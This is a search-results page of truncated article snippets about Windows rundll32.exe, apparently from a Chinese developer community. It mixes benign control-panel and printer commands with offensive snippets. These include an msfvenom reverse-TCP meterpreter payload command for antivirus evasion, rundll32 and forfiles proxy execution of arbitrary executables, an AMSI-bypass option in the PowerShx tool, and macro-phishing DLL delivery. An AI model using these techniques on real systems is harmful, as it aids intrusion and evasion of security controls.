首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    用xp系统的rundll32进行锁屏!!!!!劲爆!!!!!

    下面是具体的Rundll32 的命令行列表:   添加删除程序   RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0   内容审查程序 User32.dll,SwapMouseButton   鼠标设置   Rundll32 Shell32.dll,Control_RunDLL main.cpl @0,0   映射网络驱动器 .dll,OpenAs_RunDLL 任意文件名   打印机用户界面   Rundll32 Printui.dll,PrintUIEntry /?    打印机管理   Rundll32 Shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder   电源设置   RunDll32.exe Shell32 Shell32.dll,Control_RunDLL HotPlug.dll   系统声音设置   Rundll32 Shell32.dll,Control_RunDLL Mmsys.cpl,

    1K20编辑于 2022-09-13
  • 来自专栏加菲猫的VFP

    Windows rundll32的用法-脚本命令管理打印机

    一、用法: rundll32 printui.dll,PrintUIEntry [options] [@commandfile] 二、参数大全: 参数 说明 /a[file] 二进制文件名 /b[name \printer rem 在本地运行添加打印机向导: rundll32 printui.dll ,PrintUIEntry /il rem 在 \machine: 运行添加打印机向导 rundll32 \printer rem 枚举每个机器打印机连接: rundll32 printui.dll,PrintUIEntry /ge /c \machine rem 用 inf 添加打印机驱动程序: rundll32 : rundll32 printui.dll,PrintUIEntry /f “results.txt” /Xg /n “printer” rem 设置打印机设置命令使用: rundll32 printui.dll : rundll32 printui.dll,PrintUIEntry /Sr /n “printer” /a “file.dat” rem 将二级打印机信息存入一个文件: rundll32 printui.dll

    62310编辑于 2024-07-01
  • 来自专栏FreeBuf

    如何使用PowerShx摆脱软件限制运行PowerShell

    直接通过命令行工具或PowerShell文件运行PowerShell脚本; 导入PowerShell模块和执行PowerShell Cmdlet; 工具依赖 · .Net 4 工具使用 .dll版本 rundll32 rundll32 PowerShx.dll,main -e 需要运行的PS脚本 rundll32 PowerShx.dll,main -f <path > 以参数形式传递和运行脚本 rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> 加载一个脚本并运行一个PS cmdlet rundll32 PowerShx.dll,main -w 在一个新的窗口中开启一个交互式终端 rundll32 PowerShx.dll,main -i 开启一个交互式终端 rundll32 PowerShx.dll,main -s 尝试绕过

    2.3K10发布于 2021-11-23
  • 来自专栏玩转云服务

    [BAT] 清除IE缓存

    @echo 现在清除Cookies @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 2 @echo 现在清除浏览历史 @Rundll32 InetCpl.cpl ,ClearMyTracksByProcess 1 @echo 现在清除临时文件夹 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 8 @echo 现在清除保存的密码 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 32 @echo 现在清除表单数据 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 16 @echo 清除以上所有项目 @Rundll32 InetCpl.cpl,ClearMyTracksByProcess 255

    4.9K72发布于 2021-09-02
  • 来自专栏Khan安全团队

    神兵利器 - PowerShx 不受软件限制运行Powershell

    用法 运行dll32 rundll32 PowerShx.dll,main -e <PS script to run> rundll32 PowerShx.dll ,main -f <path> Run the script passed as argument rundll32 PowerShx.dll,main -f <path Start an interactive console in a new window rundll32 PowerShx.dll,main -i Start an interactive console rundll32 PowerShx.dll,main -s Attempt to bypass AMSI rundll32 PowerShx.dll,main -v Print Execution Output to the console 替代

    1.2K40发布于 2021-10-25
  • 来自专栏CSDNToQQCode

    RunTime类,后台快速打开浏览器

    action { public static void main(String[] args) { Runtime rt=Runtime.getRuntime(); try { rt.exec("rundll32 action { public static void main(String[] args) { Runtime rt=Runtime.getRuntime(); try { rt.exec("rundll32 红目香薰\\index.html"); } catch (IOException e) { // TODO 自动生成的 catch 块 e.printStackTrace(); } } } rundll32

    58620编辑于 2022-11-28
  • 来自专栏红队蓝军

    ATT&CK矩阵的攻与防

    axgg.exe 利用forfiles forfiles -P c:\windows\ /m *.prx /c "cmd /c c:\users\axingg\desktop\axgg.exe 利用rundll32 执行 rundll32 advpack.dll RegisterOCX axgg.exe 当然,rundll32还可以变形出很多 rundll32 url.dll,FileProtocolHandler file://C:\Users\axingg\Desktop\axgg.exe rundll32 url.dll,OpenURL axgg.exe rundll32 zipfldr.dll, RouteTheCall axgg.exe rundll32 javascript:".. 巧用copy&&rename 比如我们的命令 rundll32 url.dll,FileProtocolHandler file://C:\Users\axingg\Desktop\axgg.exe copy

    1.2K20编辑于 2022-07-06
  • 来自专栏XRSec.Blog

    脚本小子免杀的一天

    meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py # 最后一行有个命令 rundll32 xxxxxxxx rundll32 charlotte.dll, UehQD3rwWxT 运行payload C:\Windows\System32\rundll32.exe C:\Users\xr

    41130编辑于 2022-03-01
  • 来自专栏中国白客联盟

    office解密宏钓鱼

    今天看到一篇主题是关于解密远程url地址,然后下载回本地进行rundll32调用的宏钓鱼文章,觉得挺有意思,就复现下。 office宏钓鱼就不多说了,在之前红蓝对抗之邮件钓鱼攻击 也有所提及。 解码出url后,下来回来,然后调用rundll32执行。 但是当我利用360查杀时,发现会提示宏病毒: ? 最后成功调用rundll32执行下载回来的dll,虽然word文档不被查杀了,但是还是会被360查杀,会提示你调用rundll32了。

    90120发布于 2020-11-03
  • 来自专栏码客

    Windows上调用Rundll32.exe打开系统页面

    shell32.dll,Control_RunDLL mmsys.cpl,,0 # 麦克风 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1 打开控制面板 rundll32 shell32,Control_RunDLL 打开关于 查看系统版本 rundll32 shell32,ShellAboutA Info-Box 打开应用卸载页面 rundll32.exe shell32

    1.1K20发布于 2021-08-13
  • 来自专栏FreeBuf

    从远程桌面服务到获取Empire Shell

    现在,我们将PowerShell提示符导航至桌面,并使用rundll32来执行dll。 rundll32 . 现在,我们使用rundll32来执行dll。之所以使用rundll32,是因为它是一个不会被Applocker阻止的二进制文件。 rundll32 .

    2.4K40发布于 2018-10-25
  • 来自专栏FreeBuf

    命令行下的“蒙面歌王”rundll32.exe

    我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。 我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。 二、用Rundll32.exe运行js或vbs的脚本代码 rundll32 javascript:"\.. 三、用Rundll32.exe执行命令绕过杀毒软件的作法 命令如下: rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exerundll32 六、网上老生常谈的rundll32的几十个常用快捷命令了,可能有些人并不清楚 命令列: rundll32.exe shell32.dll,Control_RunDLL 功能: 显示控制面板 命令列: rundll32

    1.7K90发布于 2018-02-07
  • 来自专栏Gamma安全实验室

    魔改 CS 加载 mimikatz 模块-bypass莫60核晶

    bypss 能执行起来)是正常能抓到的,也不会爆毒,但是 cs 默认的 logonpasswords 命令是会被拦截的,也就是会弹框,原因是 cs 中默认的 mimikatz 他的执行 是通过反射到 rundll32 这种新起进程的,反射行为正对 360 拦截的规则, 在实际的测试中,在 360 物理核晶的模式下,注入自己进程的进程是不会拦截的,所以这里 就想着把 logonpasswords 的执行代码给替换了,rundll32 : 执行函数 LogonPasswords: 然后: 然后: 然后: 然后: Spawn 方法源码: Inject 方法的源码: 具体实现如上,反射执行 dll,这里他默认是会派生一个 rundll32

    1.5K20编辑于 2022-12-02
  • 来自专栏大大刺猬

    windowns CMD 一些常用命令及用法

    interface ipv4 set address "本地连接" static 192.168.1.2 255.255.255.0 192.168.1.1 设置静态IP ---- 设置默认打印机 rundll32 printui.dll,PrintUIEntry /y /n "打印机名字" rundll32 printui.dll,PrintUIEntry /? 

    76740发布于 2018-12-10
  • 来自专栏漏洞知识库

    基于Windows白名单执行Payload上线Metasploit - 渗透红队笔记

    基于白名单绕过 测试环境 攻击机:kali(192.168.2.12) 靶机:Win7(192.168.2.13) 靶机:Win10(192.168.2.4) ---- 基于白名单Rundll32上线 ---- Rundll32是指32位的DLL文件,它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。 然后把刚刚MSF生成的 shellcode.dll 上传到目标服务器,加载rundll32.exe运行: rundll32.exe目录:C:\Windows\SysWOW64\rundll32.exe 运行:rundll32 Rundll32命令执行 rundll32.exe还可以执行命令,可绕过一些waf:(打开远程桌面) rundll32.exe javascript:"\..

    2.8K20发布于 2020-11-25
  • 来自专栏FreeBuf

    ATBroker.exe:一个被病毒利用的微软进程

    本次抓到的样本,通过利用atbroker.exe自启病毒母体,然后通过rundll32加载恶意模块,最后实现文件的md5修改、释放和执行挖矿程序。 释放并加载ibll文件后,接着起rundll32加载idTemp.data,函数入口CgvSEcXgGkbWwkFa。 接着rundll32调起Mine.exe(MD5:c849f42721cc0a0d66f405602126ecf0),运行参数 woshiyizhixiaomaolv ?

    1.8K30发布于 2018-07-30
  • 来自专栏FreeBuf

    2020年黑客首选10大Windows网络攻击技术

    2、19%:签名的二进制进程执行 排名第二的攻击使用2种技术:Rundll32和Mshta。两者都允许攻击者通过受信任的签名二进制文件创建恶意代码。同样,攻击者使用的是离地攻击。 对此,建议企业可以为恶意使用的Rundll32设置警报,并且同样建立一个基线。 3、16%:创建和修改系统流程 Blue Mockingbird,这是利用Windows服务的单一威胁。

    1.2K50发布于 2021-05-20
  • 来自专栏HACK学习

    魔改CobaltStrike:探究beacon里每个功能点是如何实现的

    3 功能剖析 spawn(x86) case1,派生会话,原理是挂起方式启动rundll32并注入dll 接收到的数据: ? 使用VirtualAllocEx()在目标rundll32进程申请内存空间: ? ? WriteProcessMemory()在申请的内存空间写入dll: ? ? Spawn(x64) case44,派生会话(x64),原理也是挂起线程rundll32线程注入dll,流程都是一样的,只是在不同文件夹在rundll32.exe ?

    3.3K10发布于 2021-06-24
  • 来自专栏Eureka的技术时光轴

    创建SvcHost.exe调用的服务原理与实践

    - Rasauto - Rasman - Remoteaccess - SENS - Sharedaccess - Tapisrv - Ntmssvc - wzcsvc C:/>rundll32 C:/>rundll32 svchostdll.dll,RundllUninstall iprip DeleteService(IPRIP) SUCCESS. 7. 参考 Platform SDK: Tools - Rundll32 1) Inside Win32 Services, Part 2 by: Mark Russinovich, at: http ArticleID=8943&pg=3 2) Platform SDK: Tools - Rundll32, at: http://msdn.microsoft.com/library/en-us/tools Platform SDK: Tools - Rundll32, at: http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp

    2.8K40发布于 2019-07-24
  • 来自专栏黑白天安全团队

    T1218.002 Control Panel滥用

    如何打开cpl 1.双击或者win+r xxx.cpl 2.control <文件名> 3.rundll32 shell32.dll,Control_RunDLL <文件名> 注意: 所有rundll32 当从命令行执行或单击时,control.exe 将control.exe file.cpl在Rundll32用于调用 CPL 的 API 函数(例如:)之前执行 CPL 文件(例如:)rundll32. CPL 文件可以通过 CPL API 函数直接执行,只需使用后面的Rundll32命令,这可能会绕过 control.exe 的检测和/或执行过滤器。

    1.3K20发布于 2021-09-28
领券